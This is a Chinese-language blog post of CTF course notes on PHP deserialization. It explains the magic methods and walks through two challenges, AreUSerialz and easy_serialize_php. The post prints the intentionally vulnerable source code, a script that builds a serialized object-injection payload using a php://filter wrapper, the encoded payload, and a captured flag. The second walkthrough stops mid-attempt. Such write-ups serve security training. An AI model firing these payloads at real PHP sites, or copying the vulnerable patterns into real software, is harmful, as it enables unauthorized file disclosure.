<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 4.2.1">
  <link rel="apple-touch-icon" sizes="180x180" href="/file/apple-touch-icon.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/file/favicon-32x32.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/file/favicon-16x16.png">
  <link rel="mask-icon" href="/file/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">


<link rel="stylesheet" href="/lib/font-awesome/css/all.min.css">

<script id="hexo-configurations">
    // Theme runtime namespace: reuse a pre-existing window.NexT object, otherwise start empty.
    var NexT = window.NexT || {};
    // Site-wide NexT theme settings emitted by Hexo at build time; consumed by the theme's scripts
    // (search, motion transitions, back-to-top, etc.). Treat as read-only generated configuration.
    var CONFIG = {"hostname":"czlz.net","root":"/","scheme":"Pisces","version":"7.8.0","exturl":false,"sidebar":{"position":"right","display":"post","padding":18,"offset":12,"onmobile":false},"copycode":{"enable":false,"show_result":false,"style":null},"back2top":{"enable":true,"sidebar":false,"scrollpercent":false},"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":false,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":true,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},"path":"search.xml"};
  </script>

  <meta name="description" content="前言第四天，PHP反序列化。">
<meta property="og:type" content="article">
<meta property="og:title" content="PHP序列化与反序列化（大比武_CTF课_第四天）">
<meta property="og:url" content="https://czlz.net/2020/jxsw_dbw_web_4/index.html">
<meta property="og:site_name" content="粗制乱造的个人网站">
<meta property="og:description" content="前言第四天，PHP反序列化。">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://czlz.net/2020/jxsw_dbw_web_4/AreUSerialz.png">
<meta property="og:image" content="https://czlz.net/2020/jxsw_dbw_web_4/easy_serialize_phppng.png">
<meta property="og:image" content="https://czlz.net/2020/jxsw_dbw_web_4/EzPHP_1.png">
<meta property="og:image" content="https://czlz.net/2020/jxsw_dbw_web_4/EzPHP_2.png">
<meta property="article:published_time" content="2020-07-01T16:00:00.000Z">
<meta property="article:modified_time" content="2020-07-03T18:23:49.247Z">
<meta property="article:author" content="粗制乱造">
<meta property="article:tag" content="CTF">
<meta property="article:tag" content="练习题">
<meta property="article:tag" content="CTF课">
<meta property="article:tag" content="WEB">
<meta property="article:tag" content="文件上传">
<meta property="article:tag" content="PHP反序列化">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://czlz.net/2020/jxsw_dbw_web_4/AreUSerialz.png">

<link rel="canonical" href="https://czlz.net/2020/jxsw_dbw_web_4/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  // Per-page flags for the theme scripts; CONFIG itself is created by the site-wide
  // configuration script earlier in <head>, so this must run after it.
  CONFIG.page = {
    sidebar: "",
    isHome : false,
    isPost : true,
    lang   : 'zh-CN'
  };
</script>

  <title>PHP序列化与反序列化（大比武_CTF课_第四天） | 粗制乱造的个人网站</title>
  






  <noscript>
  <style>
  /* <noscript> fallback: with scripting disabled, reset the opacity/position that the
     motion stylesheet presumably sets up for the JS-driven entrance animations
     (CONFIG.motion.enable), so page content is not left invisible. */
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  /* Logo decoration lines: undo the offsets the animation would otherwise start from. */
  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>


    


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content post posts-expand">
            

    
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="https://czlz.net/2020/jxsw_dbw_web_4/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/file/avatar.png">
      <meta itemprop="name" content="粗制乱造">
      <meta itemprop="description" content="">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="粗制乱造的个人网站">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          PHP序列化与反序列化（大比武_CTF课_第四天）
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-calendar"></i>
              </span>
              <span class="post-meta-item-text">发表于</span>

              <time title="创建时间：2020-07-02 00:00:00" itemprop="dateCreated datePublished" datetime="2020-07-02T00:00:00+08:00">2020-07-02</time>
            </span>
              <span class="post-meta-item">
                <span class="post-meta-item-icon">
                  <i class="far fa-calendar-check"></i>
                </span>
                <span class="post-meta-item-text">更新于</span>
                <time title="修改时间：2020-07-04 02:23:49" itemprop="dateModified" datetime="2020-07-04T02:23:49+08:00">2020-07-04</time>
              </span>
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-folder"></i>
              </span>
              <span class="post-meta-item-text">分类于</span>
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/CTF/" itemprop="url" rel="index"><span itemprop="name">CTF</span></a>
                </span>
                  ，
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/CTF/%E7%AC%94%E8%AE%B0/" itemprop="url" rel="index"><span itemprop="name">笔记</span></a>
                </span>
                  ，
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/CTF/%E7%AC%94%E8%AE%B0/WEB/" itemprop="url" rel="index"><span itemprop="name">WEB</span></a>
                </span>
                  ，
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/CTF/%E7%AC%94%E8%AE%B0/WEB/PHP%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/" itemprop="url" rel="index"><span itemprop="name">PHP反序列化</span></a>
                </span>
            </span>

          

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <!-- toc -->
<h1 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h1><p>第四天，PHP反序列化。</p>
<a id="more"></a>
<h1 id="笔记"><a href="#笔记" class="headerlink" title="笔记"></a>笔记</h1><h2 id="PHP的序列化与反序列化"><a href="#PHP的序列化与反序列化" class="headerlink" title="PHP的序列化与反序列化"></a>PHP的序列化与反序列化</h2><p>• 序列化是将变量转换为可保存或传输字符串的过程<br>• 反序列化就是在适当的时候把这个字符串再转化成之前的变量来使用<br>• php进行序列化的目的是保存一个对象方便以后重用<br>• php提供了serialize和unserialize函数用以进行序列化和反序列化的操作<br>• Serialize将变量转化为字符串并且在转换中保存当前变量的值<br>• Unserialize将serialize生成的字符串变换回变量</p>
<h2 id="PHP中的魔术方法"><a href="#PHP中的魔术方法" class="headerlink" title="PHP中的魔术方法"></a>PHP中的魔术方法</h2><p>1、__get、__set 这两个方法是为在类和他们的父类中没有声明的属性而设计的 __get( $property ) 当调用一个未定义的属性时访问此方法 __set( $property, $value ) 给一个未定义的属性赋值时调用 这里的没有声明包括访问控制为protected、private的属性（即没有权限访问的属性）<br>2、__isset、__unset __isset( $property ) 当在一个未定义的属性上调用isset()函数时调用此方法 __unset( $property ) 当在一个未定义的属性上调用unset()函数时调用此方法 与__get方法和__set方法相同，这里的没有声明包括访问控制为protected、private的属性（即没有权限访问的属性）<br>3、__call __call( $method, $arg_array ) 当调用一个未定义(包括没有权限访问)的方法时调用此方法<br>4、__autoload __autoload 函数，使用尚未被定义的类时自动调用。通过此函数，脚本引擎在 PHP 出错失败前有了最后一个机会加载所需的类。 注意: 在 __autoload 函数中抛出的异常不能被 catch 语句块捕获并导致致命错误。<br>5、__construct、__destruct __construct 构造方法，当一个对象被创建时调用此方法，好处是可以使构造方法有一个独一无二的名称，无论它所在的类的名称是什么，这样你在改变类的名称时，就不需要改变构造方法的名称 __destruct 析构方法，PHP将在对象被销毁前（即从内存中清除前）调用这个方法 默认情况下,PHP仅仅释放对象属性所占用的内存并销毁对象相关的资源，析构函数允许你在使用一个对象之后执行任意代码来清除内存，当PHP决定你的脚本不再与对象相关时，析构函数将被调用，在一个函数的命名空间内，这会发生在函数return的时候，对于全局变量，这发生于脚本结束的时候，如果你想明确地销毁一个对象，你可以给指向该对象的变量分配任何其它值，通常将变量赋值为NULL或者调用 unset。<br>6、__clone PHP5中的对象赋值是使用的引用赋值，使用clone方法复制一个对象时，对象会自动调用__clone魔术方法，如果在对象复制需要执行某些初始化操作，可以在__clone方法实现。<br>7、__toString __toString方法在将一个对象转化成字符串时自动调用，比如使用echo打印对象时，如果类没有实现此方法，则无法通过echo打印对象，而是会显示：Catchable fatal error: Object of class test could not be converted to string in，此方法必须返回一个字符串。 在PHP 5.2.0之前，__toString方法只有结合使用echo() 或 print()时才能生效。PHP 5.2.0之后，则可以在任何字符串环境生效（例如通过printf()，使用%s修饰符），但不能用于非字符串环境（如使用%d修饰符）。从PHP 5.2.0，如果将一个未定义__toString方法的对象转换为字符串，会报出一个 E_RECOVERABLE_ERROR错误。<br>8、__sleep、__wakeup __sleep 串行化的时候用 __wakeup 反串行化的时候调用 serialize() 检查类中是否有魔术名称 __sleep 的函数。如果这样，该函数将在任何序列化之前运行。它可以清除对象并应该返回一个包含有该对象中应被序列化的所有变量名的数组。 使用 __sleep 的目的是关闭对象可能具有的任何数据库连接，提交等待中的数据或进行类似的清除任务。 此外，如果有非常大的对象而并不需要完全储存下来时此函数也很有用。 相反地，unserialize() 检查具有魔术名称 __wakeup 的函数的存在。如果存在，此函数可以重建对象可能具有的任何资源。使用 __wakeup 的目的是重建在序列化中可能丢失的任何数据库连接以及处理其它重新初始化的任务。<br>9、__set_state 当调用var_export()时，这个静态方法会被调用（自PHP 5.1.0起有效）。本方法的唯一参数是一个数组，其中包含按array(’property’ =&gt; value, 
…)格式排列的类属性。<br>10、__invoke 当尝试以调用函数的方式调用一个对象时，__invoke 方法会被自动调用。PHP5.3.0以上版本有效。<br>11、__callStatic 它的工作方式类似于 __call() 魔术方法，__callStatic() 是为了处理静态方法调用，PHP5.3.0以上版本有效，PHP 确实加强了对 __callStatic() 方法的定义；它必须是公共的，并且必须被声明为静态的。同样， __call() 魔术方法必须被定义为公共的，所有其他魔术方法都必须如此。</p>
<h2 id="PHP反序列化漏洞原理"><a href="#PHP反序列化漏洞原理" class="headerlink" title="PHP反序列化漏洞原理"></a>PHP反序列化漏洞原理</h2><p>· php反序列化漏洞又称对象注入，可能会导致注入、远程代码执行等安全问题的发生。<br>· php反序列化漏洞如何产生:<br>如果一段php代码使用unserialize函数去还原某个类的对象，该类中的一些魔术方法（magic method）会被自动执行。如果这些魔术方法中包含了危险操作，或者会去调用类中其他带有危险操作的函数，而这些操作所依赖的数据又是输入者可控的，那么这些危险操作就会被外部输入触发，这正是漏洞所在。</p>
<h2 id="序列化测试"><a href="#序列化测试" class="headerlink" title="序列化测试"></a>序列化测试</h2><p>看看public、private、protected的成员变量在序列化以后有什么不同。</p>
<h1 id="做题"><a href="#做题" class="headerlink" title="做题"></a>做题</h1><h2 id="网鼎杯2020青龙组-AreUSerialz"><a href="#网鼎杯2020青龙组-AreUSerialz" class="headerlink" title="[网鼎杯2020青龙组]AreUSerialz"></a>[网鼎杯2020青龙组]AreUSerialz</h2><p>废话少说直接上代码</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span 
class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">include</span>(<span class="string">"flag.php"</span>);</span><br><span class="line"></span><br><span class="line">highlight_file(<span class="keyword">__FILE__</span>);</span><br><span class="line"></span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">FileHandler</span> </span>&#123;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">protected</span> $op;</span><br><span class="line">    <span class="keyword">protected</span> $filename;</span><br><span class="line">    <span class="keyword">protected</span> $content;</span><br><span class="line"></span><br><span class="line">    <span class="function"><span class="keyword">function</span> <span class="title">__construct</span><span class="params">()</span> </span>&#123;</span><br><span class="line">        $op = <span class="string">"1"</span>;</span><br><span class="line">        $filename = <span class="string">"/tmp/tmpfile"</span>;</span><br><span class="line">        $content = <span class="string">"Hello World!"</span>;</span><br><span class="line">        <span 
class="keyword">$this</span>-&gt;process();</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">process</span><span class="params">()</span> </span>&#123;</span><br><span class="line">        <span class="keyword">if</span>(<span class="keyword">$this</span>-&gt;op == <span class="string">"1"</span>) &#123;</span><br><span class="line">            <span class="keyword">$this</span>-&gt;write();</span><br><span class="line">        &#125; <span class="keyword">else</span> <span class="keyword">if</span>(<span class="keyword">$this</span>-&gt;op == <span class="string">"2"</span>) &#123;</span><br><span class="line">            $res = <span class="keyword">$this</span>-&gt;read();</span><br><span class="line">            <span class="keyword">$this</span>-&gt;output($res);</span><br><span class="line">        &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">            <span class="keyword">$this</span>-&gt;output(<span class="string">"Bad Hacker!"</span>);</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">private</span> <span class="function"><span class="keyword">function</span> <span class="title">write</span><span class="params">()</span> </span>&#123;</span><br><span class="line">        <span class="keyword">if</span>(<span class="keyword">isset</span>(<span class="keyword">$this</span>-&gt;filename) &amp;&amp; <span class="keyword">isset</span>(<span class="keyword">$this</span>-&gt;content)) &#123;</span><br><span class="line">            <span class="keyword">if</span>(strlen((string)<span class="keyword">$this</span>-&gt;content) &gt; <span class="number">100</span>) &#123;</span><br><span class="line">                <span 
class="keyword">$this</span>-&gt;output(<span class="string">"Too long!"</span>);</span><br><span class="line">                <span class="keyword">die</span>();</span><br><span class="line">            &#125;</span><br><span class="line">            $res = file_put_contents(<span class="keyword">$this</span>-&gt;filename, <span class="keyword">$this</span>-&gt;content);</span><br><span class="line">            <span class="keyword">if</span>($res) <span class="keyword">$this</span>-&gt;output(<span class="string">"Successful!"</span>);</span><br><span class="line">            <span class="keyword">else</span> <span class="keyword">$this</span>-&gt;output(<span class="string">"Failed!"</span>);</span><br><span class="line">        &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">            <span class="keyword">$this</span>-&gt;output(<span class="string">"Failed!"</span>);</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">private</span> <span class="function"><span class="keyword">function</span> <span class="title">read</span><span class="params">()</span> </span>&#123;</span><br><span class="line">        $res = <span class="string">""</span>;</span><br><span class="line">        <span class="keyword">if</span>(<span class="keyword">isset</span>(<span class="keyword">$this</span>-&gt;filename)) &#123;</span><br><span class="line">            $res = file_get_contents(<span class="keyword">$this</span>-&gt;filename);</span><br><span class="line">        &#125;</span><br><span class="line">        <span class="keyword">return</span> $res;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">private</span> <span class="function"><span class="keyword">function</span> <span class="title">output</span><span class="params">($s)</span> 
</span>&#123;</span><br><span class="line">        <span class="keyword">echo</span> <span class="string">"[Result]: &lt;br&gt;"</span>;</span><br><span class="line">        <span class="keyword">echo</span> $s;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="function"><span class="keyword">function</span> <span class="title">__destruct</span><span class="params">()</span> </span>&#123;</span><br><span class="line">        <span class="keyword">if</span>(<span class="keyword">$this</span>-&gt;op === <span class="string">"2"</span>)</span><br><span class="line">            <span class="keyword">$this</span>-&gt;op = <span class="string">"1"</span>;</span><br><span class="line">        <span class="keyword">$this</span>-&gt;content = <span class="string">""</span>;</span><br><span class="line">        <span class="keyword">$this</span>-&gt;process();</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">is_valid</span><span class="params">($s)</span> </span>&#123;</span><br><span class="line">    <span class="keyword">for</span>($i = <span class="number">0</span>; $i &lt; strlen($s); $i++)</span><br><span class="line">        <span class="keyword">if</span>(!(ord($s[$i]) &gt;= <span class="number">32</span> &amp;&amp; ord($s[$i]) &lt;= <span class="number">125</span>))</span><br><span class="line">            <span class="keyword">return</span> <span class="keyword">false</span>;</span><br><span class="line">    <span class="keyword">return</span> <span class="keyword">true</span>;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>($_GET&#123;<span class="string">'str'</span>&#125;)) 
&#123;</span><br><span class="line"></span><br><span class="line">    $str = (string)$_GET[<span class="string">'str'</span>];</span><br><span class="line">    <span class="keyword">if</span>(is_valid($str)) &#123;</span><br><span class="line">        $obj = unserialize($str);</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>代码审计:<br>第一、要绕过的是is_valid。这个很好理解，ord是取字符的ASCII码</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">int ord ( string $string )</span><br><span class="line">返回字符串 string 第一个字符的 ASCII 码值。</span><br></pre></td></tr></table></figure>
<p>所以这个函数就是要验证字符串是否全部由可见字符组成。</p>
<p>第二、__construct构造函数看起来是最先执行的，而__destruct析构函数是最后执行。</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">__construct</span><span class="params">()</span> </span>&#123;</span><br><span class="line">        $op = <span class="string">"1"</span>;</span><br><span class="line">        $filename = <span class="string">"/tmp/tmpfile"</span>;</span><br><span class="line">        $content = <span class="string">"Hello World!"</span>;</span><br><span class="line">        <span class="keyword">$this</span>-&gt;process();</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>但是构造函数里对$op、$filename、$content的赋值均未加$this-&gt;，赋的只是局部变量。也就是说它根本没有改变对象中对应属性的值。</p>
<p>第三、process函数与__destruct函数对$this-&gt;op的比较使用了不同的方法：process使用了==，而__destruct中使用了===。由于==存在类型转换，这里存在比较上的漏洞。因为如果一边是数字，那么==比较时会把两边都转为数字再比较。（感谢同事的提点）</p>
<p>第四、protected属性在序列化的时候会出现%00，这太讨厌了，它属于不可见字符，会被过滤掉，要想办法解决掉。不知道如果把protected改成public能不能行。</p>
<p>尝试构造：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">FileHandler</span> </span>&#123;</span><br><span class="line">    <span class="comment">//为了过判断，使用了数值型。</span></span><br><span class="line">    <span class="keyword">public</span> $op =<span class="number">2</span> ;</span><br><span class="line">    <span class="comment">//通过伪协议获取flag.php的源码。</span></span><br><span class="line">    <span class="keyword">public</span> $filename = <span class="string">"php://filter/read=convert.base64-encode/resource=flag.php"</span>;</span><br><span class="line">    <span class="keyword">public</span> $content;</span><br><span class="line">&#125;</span><br><span class="line">$a=<span class="keyword">new</span> FileHandler();</span><br><span class="line"><span class="keyword">echo</span> serialize($a);</span><br><span class="line"><span class="keyword">echo</span> <span class="string">"\n&lt;br /&gt;"</span>;</span><br><span class="line"><span class="keyword">echo</span> urlencode(serialize($a));</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>
<p>生成得到payload</p>
<figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">O:11:"FileHandler":3:&#123;s:2:"op";i:2;s:8:"filename";s:57:"php://filter/read=convert.base64-encode/resource=flag.php";s:7:"content";N;&#125;</span><br><span class="line"></span><br><span class="line">O%3A11%3A%22FileHandler%22%3A3%3A%7Bs%3A2%3A%22op%22%3Bi%3A2%3Bs%3A8%3A%22filename%22%3Bs%3A57%3A%22php%3A%2F%2Ffilter%2Fread%3Dconvert.base64-encode%2Fresource%3Dflag.php%22%3Bs%3A7%3A%22content%22%3BN%3B%7D</span><br></pre></td></tr></table></figure>
<p>由于没有%00的存在，提交哪个好像都可以。<br><img src="AreUSerialz.png" alt="得到flag"><br>再解码BASE64得到flag<br>flag{786817fe-f122-4c41-8d34-1252c2dd49b7}</p>
<h2 id="安洵杯2019-easy-serialize-php"><a href="#安洵杯2019-easy-serialize-php" class="headerlink" title="[安洵杯2019]easy_serialize_php"></a>[安洵杯2019]easy_serialize_php</h2><p>先上代码</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"></span><br><span class="line">$function = @$_GET[<span class="string">'f'</span>];</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">filter</span><span class="params">($img)</span></span>&#123;</span><br><span class="line">    $filter_arr = <span class="keyword">array</span>(<span class="string">'php'</span>,<span class="string">'flag'</span>,<span class="string">'php5'</span>,<span class="string">'php4'</span>,<span 
class="string">'fl1g'</span>);</span><br><span class="line">    $filter = <span class="string">'/'</span>.implode(<span class="string">'|'</span>,$filter_arr).<span class="string">'/i'</span>;</span><br><span class="line">    <span class="keyword">return</span> preg_replace($filter,<span class="string">''</span>,$img);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span>($_SESSION)&#123;</span><br><span class="line">    <span class="keyword">unset</span>($_SESSION);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">$_SESSION[<span class="string">"user"</span>] = <span class="string">'guest'</span>;</span><br><span class="line">$_SESSION[<span class="string">'function'</span>] = $function;</span><br><span class="line"></span><br><span class="line">extract($_POST);</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span>(!$function)&#123;</span><br><span class="line">    <span class="keyword">echo</span> <span class="string">'&lt;a href="index.php?f=highlight_file"&gt;source_code&lt;/a&gt;'</span>;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span>(!$_GET[<span class="string">'img_path'</span>])&#123;</span><br><span class="line">    $_SESSION[<span class="string">'img'</span>] = base64_encode(<span class="string">'guest_img.png'</span>);</span><br><span class="line">&#125;<span class="keyword">else</span>&#123;</span><br><span class="line">    $_SESSION[<span class="string">'img'</span>] = sha1(base64_encode($_GET[<span class="string">'img_path'</span>]));</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">$serialize_info = filter(serialize($_SESSION));</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span>($function == <span 
class="string">'highlight_file'</span>)&#123;</span><br><span class="line">    highlight_file(<span class="string">'index.php'</span>);</span><br><span class="line">&#125;<span class="keyword">else</span> <span class="keyword">if</span>($function == <span class="string">'phpinfo'</span>)&#123;</span><br><span class="line">    <span class="keyword">eval</span>(<span class="string">'phpinfo();'</span>); <span class="comment">//maybe you can find something in here!</span></span><br><span class="line">&#125;<span class="keyword">else</span> <span class="keyword">if</span>($function == <span class="string">'show_image'</span>)&#123;</span><br><span class="line">    $userinfo = unserialize($serialize_info);</span><br><span class="line">    <span class="keyword">echo</span> file_get_contents(base64_decode($userinfo[<span class="string">'img'</span>]));</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>一、大概分析了一下代码，extract($_POST);感觉出现得很诡异。<br>查了一下手册，<br>解释为：extract — 从数组中将变量导入到当前的符号表。<br>按照我自己的理解，通过POST提交的数据都会直接转换成当前作用域中的“变量名=变量值”。<br>这里序列化的就是$_SESSION，而extract($_POST)又是在给$_SESSION赋值之后才执行的，所以POST的内容可以覆盖它。那么我就考虑以$_SESSION["hehe"]=变量值的形式来提交。</p>
<p>二、关键函数<br>$userinfo = unserialize($serialize_info);<br>echo file_get_contents(base64_decode($userinfo['img']));<br>即反序列化$serialize_info后取出其中['img']的值，把它做base64解码当作文件路径，读取该文件的内容并显示到当前页面上。</p>
<p>三、在网上找了一下关于PHP序列化的资料。<br>发现了一个叫做序列化逃逸的东西，一时不知道怎么解释，直接试着操作一下吧。</p>
<p>四、文件路径信息<br>根据题目中给出的网站源码<br><a href="https://github.com/D0g3-Lab/i-SOON_CTF_2019/tree/master/Web/easy_serialize_php" target="_blank" rel="noopener">https://github.com/D0g3-Lab/i-SOON_CTF_2019/tree/master/Web/easy_serialize_php</a><br>有几个文件比较特别，先转换成base64备用<br>d0g3_f1ag.php:ZDBnM19mMWFnLnBocA==</p>
<p>五、尝试解题<br>我将源码下载下来在本地测试</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line">$_SESSION[<span class="string">"user"</span>] = <span class="string">'guest'</span>;</span><br><span class="line">$_SESSION[<span class="string">'function'</span>] = $function;</span><br><span class="line"></span><br><span class="line">extract($_POST);</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span>(!<span class="keyword">isset</span>($_GET[<span class="string">'img_path'</span>]))&#123;</span><br><span class="line">    $_SESSION[<span class="string">'img'</span>] = base64_encode(<span class="string">'guest_img.png'</span>);</span><br><span class="line">&#125;<span class="keyword">else</span>&#123;</span><br><span class="line">    $_SESSION[<span class="string">'img'</span>] = sha1(base64_encode($_GET[<span class="string">'img_path'</span>]));</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">$serialize_info = filter(serialize($_SESSION));</span><br><span class="line"><span class="comment">//输出序列化的结果</span></span><br><span class="line"><span class="keyword">echo</span> $serialize_info;</span><br></pre></td></tr></table></figure>
